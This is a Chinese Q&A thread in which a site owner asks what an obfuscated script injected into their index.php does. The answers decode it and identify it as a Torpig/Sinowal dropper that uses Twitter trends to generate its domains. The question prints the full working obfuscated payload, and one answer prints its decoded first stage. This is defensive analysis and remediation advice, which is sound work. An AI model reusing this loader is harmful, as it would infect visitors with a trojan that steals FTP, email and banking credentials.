请帮我解读这段神秘代码——它莫名其妙地出现在我的 index.php 中

时间:2010-01-25 17:20:37

标签: php

有人恶意把下面这段代码插入了我的网站 ahoffmanawning.com。这种事能通过写得不好的 PHP 脚本做到吗?更重要的是,这个脚本到底在做什么?

<script language="javascript">
// NOTE(review): this is the injected payload exactly as found in index.php. Do NOT load it in a browser.
// Layer 1: $a is a percent-escaped string in which every '%' has been replaced by 'Z'.
// z() at the end of the block restores the '%' characters and unescape()s the result;
// eval(z($a)) then executes it. The line breaks inside the string literal are almost
// certainly display wrapping of one very long line - as shown they would be a syntax error.
// What the decoded layer does (see the unescaped listing in answer 1): if no 'rf5f6ds'
// cookie is present it document.write()s a hidden 1x1 <img> and a JSONP <script> for
// http://search.twitter.com/trends/daily.json; callback() derives a UTC date 2-3 days
// back and requests that day's trends with callback2, which sets the cookie for 7 days,
// eval()s further unescaped code and document.write()s the result. A second XOR layer
// (dcs(): charCodeAt(0)^('0x0'+es), keys 10 and 14) hides the strings da..de and cu and
// is only decoded at runtime; decoded, it appears to walk window.tw.trends (the fetched
// Twitter data) - confirm against the wepawet analysis linked in answer 2, which
// identifies this as the Torpig/Sinowal Twitter-trend variant.
$a="Z63dZ3dZ22Z253dst+Z2553tZ2572iZ256eg.Z2566Z2572oZ256dCZ2568arCZ256fdeZ2528(tmZ2570Z252eZ2563hZ22;dzZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564wZ2528t)Z257bcaZ253dZ2527Z252564Z25256fcZ252575mZ252565Z256eZ2574.Z252577ritZ252565Z25252Z2538Z252522Z2527;ceZ253dZ2527Z25252Z2532)Z2527;cZ2562Z253dZ2527Z25253cscrZ252569pZ252574Z2520Z25256caZ25256eguZ252561gZ252565Z25253dZ25255cZ252522Z256aaZ2576aZ2573Z2563Z252572iZ252570tZ2525Z2535Z2563Z252522Z25253Z2565Z2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ252572Z2569Z252570Z252574Z25253eZ2527;eZ2576aZ256c(unZ2565scaZ2570e(Z2574))Z257dZ253bZ22;caZ3dZ22Z2566Z2575Z256ecZ2574iZ256fn dZ2563sZ2528ds,Z2565sZ2529Z257bdsZ253duneZ2573capZ2565Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;opZ3dZ22Z2524Z2561Z253dZ2522dw(dcsZ2528cu,Z25314)Z2529;Z2522Z253bZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bdZ2562Z252bZ2564Z2563+Z2564dZ252bdZ2565Z252c1Z2530)Z253bdZ2577(Z2573Z2574Z2529;Z2573tZ253dZ2524aZ253bZ2522;Z22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d
7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;czZ3dZ22Z2566Z2575Z256eZ2563tioZ256eZ2520czZ2528cz)Z257brZ2565tuZ2572n Z2563aZ252bcb+Z2563cZ252bcdZ252bce+Z2563Z257aZ253b}Z253bZ22;ceZ3dZ22aZ2572Z2543odZ2565AtZ25280)Z255eZ2528Z25270x0Z2530Z2527+eZ2573))Z2529;Z257dZ257dZ22;ccZ3dZ225ngtZ2568Z253bZ2569+Z252b)Z257btmpZ253ddZ2573.Z2573licZ2565(iZ252ci+Z2531);Z2573tZ22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;cbZ3dZ22(Z2564s);Z2573tZ253dtmZ2570Z253dZ2527Z2527;forZ2528Z2569Z253d0Z253bZ2569Z253cds.lZ256Z22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sz|KZ2520;64c}p`|)Z25$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;Z69Z66Z20(Z64Z6fcuZ6denZ74.coZ6fkieZ2eindZ65xOZ66Z28Z27rf5fZ36Z64sZ27)Z3dZ3d-1)Z7bfunZ63Z74iZ6fn Z63allZ62aZ63Z6b(xZ29Z7bwindoZ77.tZ77Z20Z3d x;Z76Z61rZ20dZ20Z3dZ20newZ20DZ61tZ65Z28);dZ2eseZ74TiZ6de(Z78Z5bZ22as_Z6fZ66Z22]*Z31Z30Z300);Z76arZ20hZ20Z3dZ20dZ2egZ65tZ55TCHZ6fursZ28);Z77iZ6edZ6fwZ2ehZ20Z3d h;if Z28h Z3e 
8)Z7bd.sZ65tZ55TCDZ61Z74eZ28d.gZ65tUZ54CZ44Z61Z74Z65()Z20-Z202);Z7delsZ65Z7bd.seZ74UTCZ44ateZ28d.Z67etUZ54CDaZ74e()Z20Z2d Z33)Z3b}wZ69ndZ6fw.gZ64Z20Z3d d;Z76arZ20tiZ6dZ65 Z3d Z6eewZ20ArZ72Z61y(Z29;vaZ72 shZ69ftZ49nZ64Z65xZ20Z3dZ20Z22Z22;timeZ5bZ22yearZ22] Z3d d.Z67etUZ54CFuZ6clZ59earZ28)Z3btimZ65[Z22moZ6etZ68Z22] Z3d dZ2egeZ74UZ54Z43MoZ6etZ68()+Z31;tZ69mZ65[Z22daZ79Z22] Z3d d.gZ65tUZ54CZ44aZ74e(Z29;ifZ20(dZ2egZ65tZ55TZ43MZ6fntZ68()+Z31 Z3cZ2010)Z7bshiZ66Z74IZ6edeZ78 Z3d timZ65[Z22yearZ22] +Z20Z22-0Z22 +Z20Z28d.gZ65tUTZ43MonZ74h(Z29+Z31Z29;}Z65Z6csZ65Z7bshifZ74InZ64eZ78 Z3d tZ69meZ5bZ22yearZ22] +Z20Z22Z2dZ22 Z2b (dZ2egeZ74Z55TCZ4donZ74h(Z29+Z31);Z7dZ69f Z28dZ2eZ67Z65tUZ54CDZ61teZ28Z29 Z3c 10Z29Z7bsZ68ifZ74IndZ65x Z3dshZ69ftZ49ndeZ78 + Z22Z2dZ30Z22 + dZ2eZ67Z65tUZ54CZ44aZ74e()Z3b}eZ6cseZ7bshZ69ftIZ6eZ64Z65Z78 Z3d sZ68ifZ74IZ6edZ65x +Z20Z22-Z22 +Z20dZ2eZ67etUZ54CDZ61tZ65()Z3b}dZ6fcZ75Z6dentZ2ewZ72iZ74Z65Z28Z22Z3cscrZ22+Z22ipt Z6caZ6eguZ61geZ3djZ61vasZ63rZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fsearchZ2eZ74wiZ74teZ72.coZ6dZ2ftrZ65nZ64Z73Z2fdaZ69Z6cyZ2eZ6asonZ3fdatZ65Z3dZ22+ shiZ66tInZ64eZ78Z2bZ22&Z63allZ62Z61Z63Z6bZ3dcallbZ61ck2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 Z2b Z22iZ70Z74Z3eZ22);Z7d fZ75nZ63tioZ6e Z63Z61lZ6cbZ61cZ6b2(Z78)Z7bwindZ6fZ77.tZ77Z20Z3d x;Z73c(Z27rf5Z666dZ73Z27,2,7)Z3bevaZ6c(Z75Z6eesZ63apeZ28dzZ2bZ63zZ2bopZ2bsZ74)+Z27dwZ28Z64z+cZ7a($Z61+stZ29Z29;Z27);dZ6fcZ75menZ74.Z77ritZ65(Z24a)Z3b}dZ6fZ63umeZ6et.wZ72iteZ28Z22Z3cimgZ20sZ72cZ3dZ27http:Z2fZ2fseZ61rcZ68Z2etZ77Z69tteZ72.coZ6dZ2fZ69mZ61Z67eZ73Z2fseZ61rcZ68Z2frss.Z70ngZ27 wZ69dtZ68Z3d1Z20Z68Z65ighZ74Z3d1 stZ79lZ65Z3dZ27visibilZ69tZ79:hiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6cangZ75agZ65Z3djavZ61sZ63riZ70tZ22+Z22 srcZ3dZ27httZ70:Z2fZ2fseaZ72ch.Z74Z77ittZ65rZ2ecomZ2fZ74renZ64sZ2fdaiZ6cy.jZ73Z6fn?cZ61lZ6cZ62ackZ3dcaZ6clbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 +Z20Z22ipZ74Z3eZ22);Z7deZ6csZ65Z7b$aZ3dZ27Z27};functionZ20sZ63Z28Z63nm,Z76Z2cedZ29Z7bvar 
eZ78dZ3dnewZ20DatZ65()Z3beZ78d.Z73Z65tZ44aZ74Z65Z28exdZ2egeZ74Z44aZ74Z65Z28)Z2bedZ29;dZ6fcZ75menZ74.cZ6fokiZ65Z3dcnZ6d+ Z27Z3dZ27 +esZ63apeZ28v)Z2bZ27;expiZ72esZ3dZ27+eZ78Z64.Z74Z6fZ47Z4dTZ53Z74rinZ67();Z7dZ3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));
</script>

4 个答案:

答案 0 :(得分:3)

重申一遍:不要在你自己的浏览器里运行这段代码,谢谢。

这是经过混淆的 JavaScript 代码;我们当中恐怕没人有足够的时间替你完整解码,但既然你不知道它是怎么进来的,它几乎可以肯定是恶意代码,会试图利用浏览器或插件的漏洞来安装恶意软件。

至于它是怎么进来的:说明有人获得了对你服务器上文件的写权限。可能的途径有(按可能性从高到低):

  • 有人发现了某个 PHP 漏洞,借此获得了对你文件系统的访问权限
  • 有人拿到了你的 FTP 账号信息
  • 能修改网站代码的人(内部人员)蓄意植入了它
  • 或者服务器上运行的 Web 服务器、数据库、操作系统或其他某个服务存在漏洞。

我会做这几件事:更换 FTP 密码(务必在一台确认未被感染的机器上操作——这个木马专门窃取 FTP 客户端保存的密码,否则新密码马上又会泄露出去),把系统里所有能更新的软件都升级到最新版本,并严格审查任何会访问文件系统的自定义 PHP 代码。清理时不要只删掉这一段脚本,还应检查文件修改时间和服务器日志,确认没有留下其他后门。


[编辑]:根据 dth 给出的链接,这段代码会下载并执行名为 Sinowal(也称 Torpig)的木马。

  

该木马试图从被感染的计算机上窃取各类系统和账户信息,可能包括:

     

•邮件客户端(如 AK-Mail、Thunderbird、TheBat)中保存的 IMAP/POP3/SMTP 用户名、密码和服务器信息
   •书签
   •Windows 通讯簿中的电子邮件地址
   •FTP 客户端(如 Trellian FTP、WS_FTP、Total Commander、Crystal FTP Pro 和 GlobalSCAPE)保存的密码及其他数据

     

它还会监视 Internet Explorer、Firefox 和 Mozilla 等网页浏览器,以窃取网上银行信息。

答案 1 :(得分:1)

下面是它解码后的内容。开头看起来像是用来掩盖真实用途的乱码,但结尾有一些访问 Twitter 的代码(我是这么认为的)。请自便!注意这只是第一层解码:da、db、dc、dd、de、cu 这些字符串仍是用 dcs() 按字符异或编码的,要到运行时才会被解开。

// Decoded first layer of the injected script (the string that eval(z($a)) executes),
// as posted by the answerer. Line breaks inside string literals are display wrapping,
// not part of the code. Do NOT run it.
//  - cd, dz, ca, cb, cc, ce, cz, op, st are percent-escaped JS fragments. dz defines
//    dw(t), which sets ca/ce/cb/cc to document.write("<script ...>...</script>") pieces
//    and eval()s unescape(t); cz() returns ca+cb+cc+cd+ce+cz; read in the order
//    ca+cb+cc+cd+ce the fragments spell out dcs(ds,es), which XORs every character of
//    unescape(ds) with ('0x0'+es) - a second obfuscation layer.
//  - da..de and cu are that XOR-encoded layer: op sets $a="dw(dcs(cu,14));" and st
//    decodes da+db+dc+dd+de with key 10. They are still encoded in this listing;
//    decoded, they appear to iterate window.tw.trends (verify by decoding offline).
//  - Runtime flow: if the 'rf5f6ds' cookie is absent, a hidden 1x1 <img> and a JSONP
//    <script> for http://search.twitter.com/trends/daily.json are written. callback(x)
//    takes x["as_of"], steps 2 days back if the UTC hour is > 8 (else 3), and requests
//    that day's trends with callback=callback2. callback2 sets rf5f6ds=2 for 7 days via
//    sc(), eval()s unescape(dz+cz+op+st) plus dw(dz+cz($a+st)), then document.write($a).
//  - The date-shifted trend lookup plus the XOR layer match the Torpig domain-generation
//    scheme described at the wepawet link in answer 2 (inferred; not decoded here).
cd="%3dst+%53t%72i%6eg.%66%72o%6dC%68arC%6fde%28(tm%70%2e%63h";dz="%66%75n%63t%6
9on %64w%28t)%7bca%3d%27%2564%256fc%2575m%2565%6e%74.%2577rit%2565%252%38%2522%2
7;ce%3d%27%252%32)%27;c%62%3d%27%253cscr%2569p%2574%20%256ca%256egu%2561g%2565%2
53d%255c%2522%6aa%76a%73%63%2572i%2570t%25%35%63%2522%253%65%27;cc%3d%27%253c%25
5c%252fsc%2572%69%2570%2574%253e%27;e%76a%6c(un%65sca%70e(%74))%7d%3b";ca="%66%7
5%6ec%74i%6fn d%63s%28ds,%65s%29%7bds%3dune%73cap%65";da="fqb0t-7vrs}vyb>s%7F}7+
0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660
gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyM
K$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv
088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0
-0gy~t%7Fg>d";op="%24%61%3d%22dw(dcs%28cu,%314)%29;%22%3b";db="g>dbu~tcKyMK$M>ae
ubi>sxqbS%7FtuQd8!90;0!%20;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxy
vdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb8
9+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudE
DSTqdu89+fqb0t-7vrs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07
vyb7<07fyv7<07huc";st="%73t%3d%22$%61%3ds%74;%64c%73(%64a%2bd%62%2b%64%63+%64d%2
bd%65%2c1%30)%3bd%77(%73%74%29;%73t%3d%24a%3b%22;";dc="7<07fuc7<07wxd7<07u~y7<07
ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<
7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}ru
bc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%
7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;
0tqi9+m0f";cz="%66%75%6e%63tio%6e%20cz%28cz)%7br%65tu%72n %63a%2bcb+%63c%2bcd%2b
ce+%63%7a%3b}%3b";ce="a%72%43od%65At%280)%5e%28%270x0%30%27+e%73))%29;%7d%7d";cc
="5ngt%68%3b%69+%2b)%7btmp%3dd%73.%73lic%65(i%2ci+%31);%73t";dd="qb0iuqbSx!<0iuq
bSx%22<0}%7F~dxSx<0tqiSx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}
%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90
;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%2
2%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050!%209M0;0
|uddubcK8888dy}uK7i";cb="(%64s);%73t%3dtm%70%3d%27%27;for%28%69%3d0%3b%69%3cds.l
%6";de="uqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK88dy}uK7}
%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|ud
dubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}
9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7
F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}r
fuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;sz|K%20;64c}p`|)%$4|q}s|`),$*(;}rfuyq*(;p}b*";if
 (document.cookie.indexOf('rf5f6ds')==-1){function callback(x){window.tw = x;var
 d = new Date();d.setTime(x["as_of"]*1000);var h = d.getUTCHours();window.h = h;
if (h > 8){d.setUTCDate(d.getUTCDate() - 2);}else{d.setUTCDate(d.getUTCDate() -
3);}window.gd = d;var time = new Array();var shiftIndex = "";time["year"] = d.ge
tUTCFullYear();time["month"] = d.getUTCMonth()+1;time["day"] = d.getUTCDate();if
 (d.getUTCMonth()+1 < 10){shiftIndex = time["year"] + "-0" + (d.getUTCMonth()+1)
;}else{shiftIndex = time["year"] + "-" + (d.getUTCMonth()+1);}if (d.getUTCDate()
 < 10){shiftIndex =shiftIndex + "-0" + d.getUTCDate();}else{shiftIndex = shiftIn
dex + "-" + d.getUTCDate();}document.write("<scr"+"ipt language=javascript"+" sr
c='http://search.twitter.com/trends/daily.json?date="+ shiftIndex+"&callback=cal
lback2'>" + "</scr" + "ipt>");} function callback2(x){window.tw = x;sc('rf5f6ds'
,2,7);eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st));');document.write($a);}docume
nt.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 hei
ght=1 style='visibility:hidden' /> <scr"+"ipt language=javascript"+" src='http:/
/search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" + "ipt>");}
else{$a=''};function sc(cnm,v,ed){var exd=new Date();exd.setDate(exd.getDate()+e
d);document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();};

答案 2 :(得分:1)

http://wepawet.cs.ucsb.edu/static/torpig-twitter.html 已经替你把所有内容解码并分析好了。

祝好,伙计。

答案 3 :(得分:0)

看起来它在获取 Twitter 的每日热门话题列表。这能否给你更多关于它是怎么进来的线索?